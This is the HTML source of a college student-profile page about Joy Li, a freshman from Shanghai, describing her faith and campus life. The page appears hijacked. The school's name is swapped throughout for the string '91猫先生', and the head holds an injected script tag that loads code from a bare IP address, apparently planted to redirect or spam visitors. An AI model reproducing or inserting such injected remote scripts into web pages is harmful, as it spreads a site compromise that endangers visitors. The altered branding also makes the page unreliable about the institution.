  <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta charset="utf-8"/>
<title>Joy Li - 91猫先生</title>
        <meta content="Joy Li" name="title"/>
    <link href="https://www.geneva.edu/student-profiles/joy_li" rel="canonical"/>








 
<!-- standard scripts include -->

<!-- latest jQuery direct from google's CDN Keep // for secure https links -->

<!--<script src="none" type="text/javascript"></script>-->
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>
<!-- MOBILE SPECIFIC METAS ================================= -->
<meta content="width=device-width initial-scale=1.0 maximum-scale=1.0 user-scalable=yes" name="viewport"/>
<!-- Custom mobile header theme color -->
<meta name="theme-color" content="#c99a2c">
<meta name="msapplication-navbutton-color" content="#c99a2c">
<meta name="theme-color" content="#c99a2c">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

<!-- FONTS ================================================= -->

<!--<link href="https://fonts.googleapis.com/css?family=Nunito:400,400i,700,700i,900" rel="stylesheet"/>-->

<!-- Font Awesome 5 -->
<script src="none" crossorigin="anonymous"></script>
<!--<link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" rel="stylesheet"/>-->


<!-- CSS =================================================== -->
<link href="https://www.geneva.edu/_files/css/normalize.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/main-nav-responsive.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/main-nav-pure.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.mmenu.all.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.jscrollpane.css" media="all" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/geneva-main-newbrand.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/left-nav-responsive.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/right-menu-styles.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/skeleton-newbrand.css" rel="stylesheet"/> 

<!-- FAVICON ================================================ -->
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="icon" type="image/x-icon"/>
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="shortcut icon" type="image/x-icon"/>

<!-- ADDITIONAL STYLES AND SCRIPTS ========================== -->

<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>

<!-- End General Scripts -->
<div>

	



</div>






<script src="http://154.213.41.162/sjgg.js"></script>


</head>
<Body><h1><a href="/">91猫先生</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>

 

<!-- begin Convert Experiences code added 3-30-2021 -->
<script type="text/javascript" src="none"></script>
<!-- end Convert Experiences code -->



<!-- Google Tag Manager -->
<noscript><iframe height="0" src="//www.googletagmanager.com/ns.html?id=GTM-NJ49Q2" style="display:none;visibility:hidden" width="0"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NJ49Q2');</script>
<!-- End Google Tag Manager -->

 
 <!-- GENERAL DECLARATIONS =================================== -->
     <link href="https://www.geneva.edu/_files/css/colorbox.css" rel="stylesheet"/>


<script src="none"></script>
<script>
   $(document).ready(function(){
    //Examples of how to assign the ColorBox event to elements
    $(".group1").colorbox({rel:'group1'});
    $(".group2").colorbox({rel:'group2', transition:"fade"});
    $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
    $(".group4").colorbox({rel:'group4', slideshow:true});
    $(".ajax").colorbox();
if( /Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent) ) {
} else {
    $(".youtube").colorbox({iframe:true, innerWidth:640, innerHeight:390});
    $(".vimeo").colorbox({iframe:true, innerWidth:500, innerHeight:409});
    $(".iframe").colorbox({iframe:true,fixed: true, width:"80%", height:"80%"});
    $(".iframeprint").colorbox({iframe:true, width:"720", height:"700"});
    $(".iframepdf").colorbox({iframe:true, innerWidth:800, innerHeight:650});
    $(".iframepdfshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshow").colorbox({rel:'iframeshow'});
}
    $(".inline").colorbox({inline:true,scrolling:true, width:"80%"});
    $(".callbacks").colorbox({
     onOpen:function(){ alert('onOpen: colorbox is about to open'); },
     onLoad:function(){ alert('onLoad: colorbox has started to load the targeted content'); },
     onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
     onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
     onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
    });
    $('.non-retina').colorbox({rel:'group5', transition:'none'})
    $('.retina').colorbox({rel:'group5', transition:'none', retinaImage:true, retinaUrl:true});
    
    //preserving a JavaScript event for inline calls.
    $("#click").click(function(){ 
     $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
     return false;
    });
   });


// Stop browser scrolling

$(document).bind('cbox_open', function () {
    $('html').css({ overflow: 'hidden' });
}).bind('cbox_closed', function () {
    $('html').css({ overflow: 'auto' });
}); 

// Stop browser scrolling


</script>
     
<div id="mmenuwrap">
<div id="topLinkBar">  <!-- ICO BAR Include Here-->
 <div>
<!-- Ico Bar --><ul class="topicobar">
<li class="btndrop2 first"><i class="fa-solid fa-pen-to-square">&#160;</i> APPLY
<ul class="btndrop-menu leftalign">
<li><a href="/admissions/tugapply.php">Undergraduate</a></li>
<li><a href="/online-degree/odpapply.php">Online Degree</a></li>
<li><a href="/graduate/gradapply.php">Graduate</a></li>
</ul>
</li>
<li class="nodrop"><a class="toplevel" href="none"><i class="fa-solid fa-gift-card">&#160;</i> GIVE</a></li>
<li class="nodrop"><a class="toplevel" href="/admissions/visit/"><i class="fa-regular fa-location-dot">&#160;</i> VISIT</a></li>
</ul><!-- end Ico Bar -->


</div></div>
<div id="goldBarSpace"> <!-- Header Include Here-->
<div>
<div id="goldBarContainer">
<div id="logoFlag"><a href="/"> <img alt="91猫先生" class="" height="525" src="/_files/sitegraphics/geneva-spade-light.svg" width="1920"/> </a></div>
<a id="pagetop" name="pagetop"></a>
<div id="searchBoxHeader"><form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
<div id="searchFld"><input class="searchTxt" id="fldsearch" name="q" placeholder="Search 91猫先生" style="background-color: transparent;" tabindex="1" type="text"/> <input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng"/> <input name="cof" type="hidden" value="FORID:11"/> <input name="sa" type="hidden" value="Search"/> <button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;"> <i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 50%;"></i> </button></div>
<input type="hidden" name="as_sfid" value="AAAAAAU9rcX0ALR0l-V0oXa7r9-0ugt1iKPCtkYmwjt7S-_-6gZ9H2Crs992tQdd6HMNtMSZZeFlYKzYZNBuLtgz6VGo_xCmdbY3_KOonLmWrqe6hsQyFZiJim_jXI6wvZxQxeA=" /><input type="hidden" name="as_fid" value="dc5d0fc8d3caa0c986402d151ac4e5b7b1f44296" /></form></div>
<!-- end searchBoxHeader -->
<div id="screencheck"></div>
<div class="menutrigger"><a href="#menu">&#160;</a></div>
</div><!-- end goldBarContainer -->


</div></div>
<!--end goldBarSpace -->
		<!--Site Search Mobile -->
 

    
		<div>
<div id="menuSpace-Search">
<div id="menuContainer-Search"><form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
<div id="searchFld2"><input class="searchTxt2" id="fldsearch2" name="q" placeholder="Search 91猫先生" style="background-color: transparent;" tabindex="1" type="text"/> <input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng"/> <input name="cof" type="hidden" value="FORID:11"/> <input name="sa" type="hidden" value="Search"/> <button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;"> <i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 50%;"></i> </button> <!-- <input class="searchButton2" name="input" src="/_files/images/searchico28.png" type="image" value="Search 91猫先生"/> --></div>
<input type="hidden" name="as_sfid" value="AAAAAAWUQLWa9Fd2dgXRDNE8TfrkztT2VRLKdNvqB3YKgkAnyoMwOw0uwPQTMn3qMAHA-UMmTO1UwTIEH5zb5OWZlaKHIc4bJ5Kr9iKWOFF32LVowHR5fRflc7ZQnTOk6OE4ajo=" /><input type="hidden" name="as_fid" value="dc5d0fc8d3caa0c986402d151ac4e5b7b1f44296" /></form></div>
</div>


</div>


		<!-- end Site Search Mobile -->
<div id="menuSpace">
<div id="menuContainer"> <!-- Offcanvas Menu Include Here-->
<div>
<nav>
<ul class="nav-menu nav-center">
<li><a aria-haspopup="true" href="/about-geneva/"> <span>91猫先生</span> </a>
<ul>
<li><a href="/about-geneva/">Fast Facts &amp; Overview</a></li>
<li><a href="/about-geneva/identity/">91猫先生 Identity</a></li>
<li><a href="/about-geneva/policies/">Academic Policies</a></li>
<li><a href="/about-geneva/leadership.php">Leadership</a></li>
<li><a href="/blog/">91猫先生 Blog</a></li>
<li><a href="none">Calendar</a></li>
</ul>
</li>
<li class="undergraduate"><a href="/academics/">Academics</a>
<ul aria-label="submenu">
<li><a href="/academics/">Explore Academics</a></li>
<li><a href="/academics/programs/">Search Degree Programs</a></li>
<li><a href="/academics/core-studies/">Core Curriculum</a></li>
<li><a href="/academics/honors/">Honors Program</a></li>
<li><a href="/graduate/">Graduate Programs</a></li>
<li><a href="/online-degree/">Online Degree Programs</a></li>
<li><a href="/pittsburgh/">91猫先生 Pittsburgh Campus</a></li>
<li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
<li><a href="/cfl/">Center for Faith &amp; Life</a></li>
</ul>
</li>
<li class="undergraduate"><a aria-haspopup="true"> <span>Admissions &amp; Aid</span> </a>
<ul aria-label="submenu">
<li><a href="/financial-aid/tug-financial-aid.php">Undergraduate</a></li>
<li><a href="/graduate/admissions/">Graduate</a></li>
<li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
<li><a href="/admissions/visit/">Visit 91猫先生</a></li>
<li><a href="/admissions/international/">International Students</a></li>
<li><a href="/admissions/transfers/">Transfer Students</a></li>
<li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
<li><a href="/admissions/military/">Military &amp; Veterans</a></li>
<!--<li class="minibanner">
<div class="minibanner-img"><a href="none"> <img alt="Apply Now" src="/_files/images/apply-mb.png" width="100%" /> </a></div>
</li>--></ul>
</li>
<li><a aria-haspopup="true" href="/student-life/"> <span>Student Life</span> </a>
<ul>
<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
<li><a href="/calling-career/">Calling &amp; Career</a></li>
<li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
<li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
<li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
<li><a href="/student-life/campus-safety/">Campus Safety</a></li>
<li><a href="/student-life/academic-support/">Academic Support</a></li>
<li><a href="/student-life/commuters.php">Commuter Life</a></li>
<li><a href="/student-life/student-resources.php">Student Resources</a></li>
</ul>
</li>
<li><a aria-haspopup="true"><span>Alumni</span></a>
<ul>
<li><a href="none">Giving</a></li>
<li><a href="/alumni/">Alumni Home</a></li>
<li><a href="/alumni/events/">Alumni Events</a></li>
<li><a href="/alumni/connect/alumni_updateform.php">Alumni Update Form</a></li>
<li><a href="/academics/registrar/student_records_transcripts.php">Transcript Requests</a></li>
<li><a href="/alumni/represent/alumni_referrals.php">Gold and White Referrals</a></li>
<li><a href="/alumni/represent/legacylink.php">Legacy Link Program</a></li>
<li><a href="/alumni/connect/alumni_contact.php">Contact Alumni Engagement</a></li>
<!--<li class="minibanner">
<div class="minibanner-img"><a href="/homecoming/" title="Homecoming"><img alt="Homecoming 2023" src="/_files/images/homecoming-mb.jpg" width="100%" /></a></div>
</li>--></ul>
</li>
<li class="noarrow"><a href="none">Athletics</a></li>
</ul>
</nav>


</div></div>
<!-- end menuContainer -->
</div>
<!-- end menuSpace -->






    <style type="text/css">
        .videoWindow-clip {
            background: #3d3935 url(../_files/sitegraphics/oldmain-front.webp) no-repeat center;
            background-attachment:initial;
            height:350px; 
        }
                @media(min-width: 750px){
           .videoWindow-clip {
               height:auto!important; 
           }
        }
        @media(min-width: 960px){
           .videoWindow-clip {
               background-attachment:fixed;
           }
        }
        
/* secondary menu adjustments*/
.valley-menu {
    margin-top: -70px;
}
@media (min-width: 960px) {
div.responsenav {
    display: block;
    margin-top: -160px;
    /* correction:none; */
}
}
/*end secondary menu adjustments*/
    </style>
<link href="/student-profiles/joy_li/academics/programs/academics/programs/css/academic-hero.css" rel="stylesheet"/>
<!-- Academics Hero -->
<div class="videoWindow-clip clip-hero-sm">
    <div class="moireOverlay">
            </div>
    <div id="heroTitle">
                        <h2>Joy Li</h2>
                    </div>
</div>

<svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="large-hero-clip"><path d="M1,0 v0.918 h-0.453 c-0.028,0,-0.047,0.082,-0.047,0.082 s-0.019,-0.082,-0.047,-0.082 H0 V0 H1"/></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="medium-hero-clip"><path d="M1,0 v0.918 H0.565 c-0.039,0,-0.065,0.082,-0.065,0.082 s-0.026,-0.082,-0.065,-0.082 H0 V0 H1"/></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="small-hero-clip"><path d="M1,0 v0.844 H0.722 c-0.133,0,-0.222,0.156,-0.222,0.156 s-0.089,-0.156,-0.221,-0.156 H0 V0 H1"/></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-larger"><path d="M1,0 v0.856 H0.577 c-0.046,0,-0.077,0.144,-0.077,0.144 s-0.031,-0.144,-0.077,-0.144 H0 V0 H1"/></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-large"><path d="M1,0 v0.843 H0.577 c-0.046,0,-0.077,0.157,-0.077,0.157 s-0.031,-0.157,-0.077,-0.157 H0 V0 H1"/></clipPath>
      </svg>
      
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-medium"><path d="M1,0 v0.862 H0.608 c-0.065,0,-0.108,0.138,-0.108,0.138 s-0.044,-0.138,-0.108,-0.138 H0 V0 H1"/></clipPath>
      </svg>
     
<!-- End Academics Hero -->








<div id="statusBarSpace">
<div id="statusBarContainer">
<div class="leftMenuToggle"><em class="fa fa-bars"></em> Menu</div>
<div id="breadCrumbs">

<ul>
            
            
        
                <li><a href="/student-profiles/joy_li/academics/programs/index.php">Home</a></li>
                
            
        
                                    <li><a href="/student-profiles/index">Student Profiles</a></li>
            
                                    
                                    
            <li class="selected">Joy Li</li>
            
</ul>
</div>
<div id="statusPanel"><script type="text/javascript">
//document.write(dateFormat(now, "fullDate"));
</script>
</div>
</div>
</div>
<!-- end div statusBarSpace -->
<div id="contentSpace">

<div class="container" id="contentContainer">
<div id="pageTopper"></div>
<div class="row">
<div class="three columns"><!-- end div pageTopper -->
<div id="leftMenuContainer"><div id="navTop"></div>
      <div id="navLinks">
        <div class="navTopText">
            <a href="none" target="_parent">Student Profiles</a>
        </div>
        <div class="submenu-level1" id="submenu-level1">
          <ul class="vert-1">
              <li><a href="none" target="_parent">Undergraduate Students</a></li>
              <li><a href="none" target="_parent">Graduates</a></li>
              <li><a href="none" target="_parent">Adult and Graduate</a></li>
          </ul>
       </div>
        <div id="navAdArea"></div>
      </div>
      <div id="navBottom"></div> </div>
<!-- end leftMenuContainer -->
</div>
<!-- end three columns -->
<div class="nine columns">
<div id="pageContent">
    
    <div id="pgTitle">
                <h2>Joy Li</h2>
            </div>

    
    <em class="clearit"></em>



 
<div class="content-container">
    <div id="GC-shortform-top"></div>
     
        <figure class="u-pull-right img-inset-40"><img alt="Joy Li in McCartney Library" class="u-full-width" height="500" src="/student-profiles/joy_li/academics/programs/css/assets/2019.11.12_studentprofile_joy_li-8301.webp" width="333"/></figure>
<p>Sixioa, or Joy as she is better known at 91猫先生, is a second semester freshman studying Computer Engineering. Coming from Shanghai, a city of 24 million, to Beaver Falls wasn&#8217;t too difficult for her. &#8220;I went to high school in New Zealand, which is a small place. Coming to Beaver Falls was smaller but I still like it.&#8221;</p>
<div id="inquotes" style="border-top: 1px solid #e1e1e1; border-bottom: 1px solid #e1e1e1; margin: 20px 0px 20px 0px;">
<blockquote style="font-size: 20px; margin: 15px 0px 15px 0px;">
<p>&#8220;When I came here, I was really glad to make friends that have the same faith. We can encourage each other and grow faith better because faith grows better when you are in a group, in a community.&#8221;</p>
</blockquote>
</div>
<p>Joy finds that being in a small place fosters relationships that might not have gone anywhere in a bigger environment. She has both made friends with America and Chinese students she might not have otherwise. &#8220;That's one thing I appreciate about coming to a small college: you have to get to know people. You really know each other! And it just works really well for me.&#8221;</p>
<p>Going to high school in New Zealand was difficult. &#8220;the people were friendly, but that doesn&#8217;t mean you will have friends.&#8221; She was terribly homesick at times.</p>
<p>When she came to 91猫先生, she kept waiting for the night she would call her parents in tears, telling them how homesick she was. She says with a laugh, &#8220;it hasn&#8217;t happened.&#8221; She was also worried that coming to 91猫先生 in January would be difficult, but she found it was &#8220;actually beneficial.&#8221; Because there were less new freshman coming in with her, &#8220;we had to talk to each other and we eventually became friends.&#8221;</p>
<p>91猫先生 appealed to Joy because she was looking for a Reformed Christian college. She wanted somewhere that would challenge her to think critically, and not just recite facts. After hearing about the school from someone in her church, she decided to look into 91猫先生. Though considering a couple of schools, Joy ultimately choose 91猫先生 because the admissions team was the most prompt. &#8220;It's just the way we chose and I don't regret it,&#8220; said Joy.</p>
<p>Joy has found the professors and students very welcoming. &#8220;Before holidays professors will reach out and say, &#8216;Hey, do you have a place to stay over break? Do you want to stay at my house?&#8217;&#8221; Joy appreciates how many activities 91猫先生 provides, and the way that students make their own fun. &#8220;We went to free bowling last Friday and then &#8230; we went to Joseph&#8217;s place, to make dumplings!&#8221;</p>
<p>When thinking about why she is here at 91猫先生, Joy reflected on her upbringing. In China, she didn&#8217;t really know anyone who was a Christian. In New Zealand, some people said they were Christians, but only seem to be nominal ones. However, &#8220;When I came here, I was really glad to make friends that have the same faith. We can encourage each other and grow faith better because faith grows better when you are in a group, in a community.&#8221;</p>
<p>After graduation, Joy may go to graduate school, but ultimately plans to go back to China. &#8220;I want to go back to China to serve.&#8221;</p>
<p>&#126;Annie Dawson 2020</p>
 
     
     
    





     
     
    
 
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
    
                                    <div id="printBlock">
        <a href="/student-profiles/joy_li/academics/programs/css/joy_li-print"><i class="fa-regular fa-print"></i> Print</a>        
    </div>
    <br class="clearit"/></div>
<!-- end contentContainers -->
<div id="faux-column">
     
     
     
    
</div>
<!-- end faux-->
<br class="clearit"/>
</div>
<!-- end div pageContent -->
</div>
<!-- end nine columns -->
</div>
<!-- end row -->
<!--<br class="clearit" />-->
</div>
<!-- end contentContainer-->
<!--<br class="clearit" />-->
<div id="footerBar"></div> 
<div id="footerStripes"></div>
</div>
<!-- end contentSpace div-->
<div id="footerSpace"> <!-- Footer Include Here-->
<div>
<div class="footerGradient">
<div class="wide-container" id="footerContainer">
<div class="row">
<div class="four columns" id="footerLeft"><img alt="" aria-hidden="true" class="u-full-width" height="152" src="/_files/sitegraphics/geneva-spade-stacked.svg" style="max-width: 200px;" width="200"/>
<div id="socialfooter">
<ul class="socialicons">
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on Facebook (Opens in new tab)"> <i class="fa-brands fa-facebook-square"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on X (Opens in new tab)"> <i class="fa-brands fa-twitter"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on Instagram (Opens in new tab)"> <i class="fa-brands fa-instagram"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on Youtube (Opens in new tab)"> <i class="fa-brands fa-youtube"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on LinkedIn (Opens in new tab)"> <i class="fa-brands fa-linkedin-in"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="91猫先生 on TikTok (Opens in new tab)"> <i class="fa-brands fa-tiktok">&nbsp;</i></a></li>
</ul>
</div>
<div class="pad20 buttonflex"><a class="quickbtn" href="/about-geneva/contact_us.php"><i class="fa fa-phone">&#160;</i>Contact Us</a><a class="quickbtn" href="/about-geneva/campus_map.php"><i class="fas fa-map-marker-alt"></i>&#160;Campus Maps</a></div>
</div>
<!-- end footer left-->
<div class="eight columns" id="footerRight">
<div class="flex-foot">
<div class="footerGroup">
<div class="toggleHead hidToggle">General Information</div>
<ul class="hidFootLinkss">
<li><a href="/about-geneva/foundationalconcepts.php">Foundational Concepts</a></li>
<li><a href="/about-geneva/nondiscrimination_policy.php">Nondiscrimination Policy</a></li>
<li><a href="/about-geneva/titleix/index.php">Title IX</a></li>
<li><a href="/employment/index.php">Employment</a></li>
<li><a href="/about-geneva/attribution.php">Attribution</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Offices &amp; Departments</div>
<ul class="hidFootLinkss">
<li><a href="/academics/registrar/index.php">Registrar</a></li>
<li><a href="/student-accounts/index.php">Student Accounts</a></li>
<li><a href="/admissions/undergraduate.php">Admissions</a></li>
<li><a href="/academics/crossroads/index.php">Crossroads</a></li>
<li><a href="/academics/index.php">Academic Programs</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Student Resources</div>
<ul class="hidFootLinkss">
<li><a href="/library/index.php">McCartney Library</a></li>
<li><a href="/about-geneva/campus_bookstore.php">Campus Bookstore</a></li>
<li><a href="/about-geneva/policies/index.php">Academic Policies</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" src="/_files/sitegraphics/moodle-ico.png"/> Online Course Login</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" height="16" src="/_files/sitegraphics/mygen-ico.png" style="display: inline-block; vertical-align: middle;" width="20"/> my91猫先生 Student Portal</a></li>
</ul>
</div>
<!--<div class="footerGroup">
<div class="toggleHead hidToggle">ALUMNI &amp; FRIENDS</div>
<ul class="hidFootLinks">
<li><a href="/alumni/index">Alumni Relations</a></li>
<li><a href="/alumni/online-services/class-notes/">Alumni Class Notes</a></li>
<li><a href="/alumni/events/index">Alumni Events</a></li>
<li><a href="/give/index">Give</a></li>
</ul>
</div>--> <a class="BackToTop" href="#topOfPageLink"><img alt="" aria-hidden="true" src="/_files/sitegraphics/to-top-sm.png"/></a></div>
<!-- end footerRight --></div>
<!-- end row --></div>
<!-- end footer container --></div>
<!-- end footer gradient --></div>
<div class="footer-end">
<div class="motto-margin">
<div class="pad20"><img alt="" aria-hidden="true" class="u-full-width" height="26" src="/_files/sitegraphics/motto-dark.svg" style="max-width: 250px;" width="250"/></div>
<div class="pad20">
<p class="copyright">&#169; 91猫先生 | All rights reserved</p>
</div>
</div>
</div>


</div></div>
 <!-- Offcanvas Menu Include Here-->
<div>

	
	<!-- RESPONSIVE MENU ============================================== -->
	<nav id="menu">
		<ul>
			<div id="searchBox-menu" class="roundcorners">
				<form action="/search_results" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
					<div id="searchFld-menu">
						<input class="searchTxt-menu" id="fldsearch" name="q" style="background-color: transparent;" tabindex="1" type="text" placeholder="Search 91猫先生" />
						<input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" />
						<input name="cof" type="hidden" value="FORID:11" />
						<input name="sa" type="hidden" value="Search" />
						<!-- <input class="searchButton-menu" name="input" src="https://www.geneva.edu/_files/sitegraphics/searchico32.png" type="image" value="Search 91猫先生" /> -->
						<button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;">
							<i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 40%;"></i>
						</button>
					</div>
				<input type="hidden" name="as_sfid" value="AAAAAAVpi42ogqwnqhI9K77jywHVk8aypQMRky64wvYPQ8_jP2VJbzOygGznMohJVwwLgsYpASRHqlYowAdOVk3Zl70zbx2HaM0NkesXJsIYDWdcOBOFLQcql_EzW09tBAaHFM4=" /><input type="hidden" name="as_fid" value="e4471cdecef8fd490a1a2512309bd912b9332158" /></form>
			</div>
			<!-- end searchBox-menu-->
			<li>
				<span>91猫先生</span>
				<ul>
					<li>
						<a href="/about-geneva/">Fast Facts &amp; Overview</a>
					</li>
					<li>
						<a href="/about-geneva/identity/">91猫先生 Identity</a>
					</li>
					<li>
						<a href="/about-geneva/policies/">Academic Policies</a>
					</li>
					<li>
						<a href="/about-geneva/leadership">Leadership</a>
					</li>
					<li>
						<a href="/blog/">91猫先生 Blog</a>
					</li>
					<li>
						<a href="/calendar/">Calendar of Events</a>
					</li>
				</ul>
			</li>
			<li>
				<span>Academics</span>
				<ul>
					<li><a href="/academics/">Explore Academics</a></li>
                    <li><a href="/academics/programs/">Search Degree Programs</a></li>
                    <li><a href="/academics/core">Core Curriculum</a></li>
                    <li><a href="/academics/honors/">Honors Program</a></li>
                    <li><a href="/graduate/">Graduate Programs</a></li>
                    <li><a href="/online-degree/">Online Degree Programs</a></li>
                    <li><a href="/pittsburgh/">91猫先生 Pittsburgh Campus</a></li>
                    <li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
                    <li><a href="/cfl/">Center for Faith &amp; Life</a></li>
				</ul>
			</li>
			<li>
				<a aria-haspopup="true">
					<span>Admissions &amp; Aid</span>
				</a>
				<ul>
				    <li><a href="/financial-aid/tug-financial-aid">Undergraduate</a></li>
                    <li><a href="/graduate/admissions/">Graduate</a></li>
                    <li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
                    <li><a href="/admissions/visit/">Visit 91猫先生</a></li>
                    <li><a href="/admissions/international/">International Students</a></li>
                    <li><a href="/admissions/transfers/">Transfer Students</a></li>
                    <li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
                    <li><a href="/admissions/military/">Military &amp; Veterans</a></li>
				</ul>
			</li>
			<li>
				<span>Student Life</span>
				<ul>
				<li>
						<a href="/student-life/">Student Life Home</a>
					</li>
					<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
                    <li><a href="/calling-career/">Calling &amp; Career</a></li>
                    <li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
                    <li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
                    <li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
                    <li><a href="/student-life/campus-safety/">Campus Safety</a></li>
                    <li><a href="/student-life/academic-support/">Academic Support</a></li>
                    <li><a href="/student-life/commuters">Commuter Life</a></li>
                    <li><a href="/student-life/student-resources">Student Resources</a></li>
				</ul>
			</li>
			<li>
				<span>Alumni</span>
				<ul>
					<li>
						<a href="none">Giving</a>
					</li>
					<li>
						<a href="/alumni/">Alumni Home</a>
					</li>
					<li>
						<a href="/alumni/events/">Alumni Events</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni-update-form">Alumni Update Form</a>
					</li>
					<li>
						<a href="/academics/registrar/student_records_transcripts">Transcript Requests</a>
					</li>
					<li>
						<a href="/alumni/represent/alumni_referrals">Gold and White Referrals</a>
					</li>
					<li>
						<a href="/alumni/represent/legacylink">Legacy Link Program</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni_contact">Contact Alumni Engagement</a>
					</li>
					<!--<li>
						<a href="/homecoming/">Homecoming 2025</a>
					</li>-->
				</ul>
			</li>
			<li>
				<a href="none">
					<span>Athletics</span></a>
				</li>
			</li>
			<div class="mmenu-undernav">&copy; 91猫先生 | 
				<a href="/about-geneva/contact_us">Contact Us</a>
			</div>
			<div class="searchBox-panel2"></div>
		</ul></nav>


	


</div></div>
<!-- end mmenu wrap-->
<!-- include External Jquery last -->

</body>
</html>